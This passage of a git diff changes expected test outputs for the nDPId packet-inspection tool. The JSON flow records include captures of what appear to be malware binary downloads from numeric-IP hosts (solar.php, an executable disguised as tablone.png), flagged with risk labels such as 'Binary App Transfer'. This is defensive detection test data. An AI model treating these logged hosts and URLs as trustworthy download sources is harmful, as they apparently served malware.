01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":11876,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1352718181050} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875523 bytes -~~ total memory freed........: 5875523 bytes -~~ total allocations/frees...: 118226/118226 +~~ total memory allocated....: 6009157 bytes +~~ total memory freed........: 6009157 bytes +~~ total allocations/frees...: 120988/120988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 2075 chars diff --git a/test/results/exe_download.pcap.out b/test/results/exe_download.pcap.out index c3d43a558..93c247392 100644 --- a/test/results/exe_download.pcap.out +++ b/test/results/exe_download.pcap.out @@ -4,9 +4,9 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"} -01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -01174{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +01174{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":703,"packets-processed":703,"total-skipped-flows":0,"total-l4-payload-len":679485,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434056186} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 703/703 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5889997 bytes -~~ total memory freed........: 5889997 bytes -~~ total allocations/frees...: 118823/118823 +~~ total memory allocated....: 6023631 bytes +~~ total memory freed........: 6023631 bytes +~~ total allocations/frees...: 121585/121585 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1179 chars diff --git a/test/results/exe_download_as_png.pcap.out b/test/results/exe_download_as_png.pcap.out index 1c5722fa8..a13b5ec8d 100644 --- a/test/results/exe_download_as_png.pcap.out +++ b/test/results/exe_download_as_png.pcap.out @@ -4,9 +4,9 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} -01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} -00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} +01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 